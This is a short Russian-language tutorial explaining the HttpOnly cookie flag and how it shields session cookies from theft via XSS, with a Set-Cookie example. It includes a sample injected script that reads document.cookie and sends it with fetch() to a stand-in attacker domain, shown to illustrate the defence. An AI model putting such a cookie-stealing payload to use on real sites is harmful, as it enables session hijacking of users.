Что такое HttpOnly cookie и зачем он нужен

1️⃣ Как кратко ответить

HttpOnly cookie — это флаг, который можно установить для cookie, чтобы ограничить доступ к нему только через HTTP(S) протоколы. Это предотвращает доступ к cookie через JavaScript, что помогает защитить его от атак XSS (Cross-Site Scripting).

2️⃣ Подробное объяснение темы

HttpOnly cookie — это специальный тип cookie, который имеет флаг HttpOnly. Этот флаг указывает браузеру, что cookie не должен быть доступен через JavaScript, что делает его более защищенным от определенных типов атак, таких как XSS (Cross-Site Scripting).

Зачем это нужно

HttpOnly cookie используется для повышения безопасности веб-приложений. Веб-приложения часто используют cookie для хранения информации о сессии пользователя, например, идентификатор сессии. Если злоумышленник сможет получить доступ к этому cookie, он может украсть сессию пользователя и получить доступ к его учетной записи. Установка флага HttpOnly предотвращает доступ к cookie через JavaScript, что делает его менее уязвимым для кражи через XSS-атаки.

Как это работает

Когда сервер отправляет cookie с флагом HttpOnly, браузер сохраняет его, но не позволяет JavaScript-коду на странице получить к нему доступ. Это значит, что даже если злоумышленник внедрит вредоносный скрипт на страницу, он не сможет прочитать значение этого cookie.

Пример использования

Рассмотрим пример, как сервер может установить HttpOnly cookie:

Set-Cookie: sessionId=abc123; HttpOnly; Secure

• Set-Cookie: Заголовок HTTP, который используется для отправки cookie от сервера к клиенту.
• sessionId=abc123: Имя и значение cookie. В данном случае, это идентификатор сессии.
• HttpOnly: Флаг, который указывает, что cookie не должен быть доступен через JavaScript.
• Secure: Дополнительный флаг, который указывает, что cookie должен передаваться только по защищенному соединению HTTPS.

Пример атаки XSS и защита с помощью HttpOnly

Предположим, что на веб-странице есть уязвимость XSS, и злоумышленник внедрил следующий скрипт:

<script>
  var cookies = document.cookie;
  // Отправка cookie на сервер злоумышленника
  fetch('https://malicious.example.com/steal-cookie?cookie=' + cookies);
</script>

Если cookie не защищены флагом HttpOnly, этот скрипт сможет получить доступ ко всем cookie и отправить их злоумышленнику. Однако, если cookie защищены флагом HttpOnly, JavaScript не сможет их прочитать, и атака будет предотвращена.

Заключение

HttpOnly cookie — это важный инструмент для защиты веб-приложений от кражи данных через XSS-атаки. Использование этого флага помогает ограничить доступ к важным данным, таким как идентификаторы сессий, и повышает общую безопасность приложения.